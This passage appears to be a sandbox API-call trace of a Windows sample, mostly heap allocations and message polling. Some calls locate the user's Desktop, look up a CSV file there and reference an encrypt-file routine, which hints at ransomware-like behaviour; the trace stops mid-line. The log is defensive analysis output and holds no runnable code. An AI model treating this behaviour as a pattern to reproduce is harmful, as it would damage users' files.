[0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0204.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0204.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0204.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0204.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0204.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pGS8H.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0204.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GS8H.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0204.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S8H.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0204.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8H.csv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0204.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0204.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0204.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0204.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0204.325] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0204.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0204.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0204.325] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0204.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0204.326] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0204.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0204.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0204.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0204.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0204.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0204.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0204.327] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0204.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0204.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0204.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0204.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0204.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0204.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0204.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0204.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0204.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53890 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0204.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0204.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0204.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0204.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0204.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0204.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0204.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0204.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0204.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0204.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0204.330] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0204.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0204.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0204.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0204.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0204.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0204.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0204.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0204.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0204.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0204.332] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0204.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0204.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0204.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0204.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0204.333] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0204.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0204.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0204.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0204.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0204.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0204.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.420] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/pGS8H.csv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadcb2240, ftCreationTime.dwHighDateTime=0x1d5e3be, ftLastAccessTime.dwLowDateTime=0x4cafb650, ftLastAccessTime.dwHighDateTime=0x1d5e6e9, ftLastWriteTime.dwLowDateTime=0x4cafb650, ftLastWriteTime.dwHighDateTime=0x1d5e6e9, nFileSizeHigh=0x0, nFileSizeLow=0x150f1, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="pGS8H.csv", cAlternateFileName="")) returned 0xa87350 [0204.420] FindClose (in: hFindFile=0xa87350 | out: hFindFile=0xa87350) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0204.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0204.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0204.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0204.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.422] HeapFree (in: hHeap=0x970000, 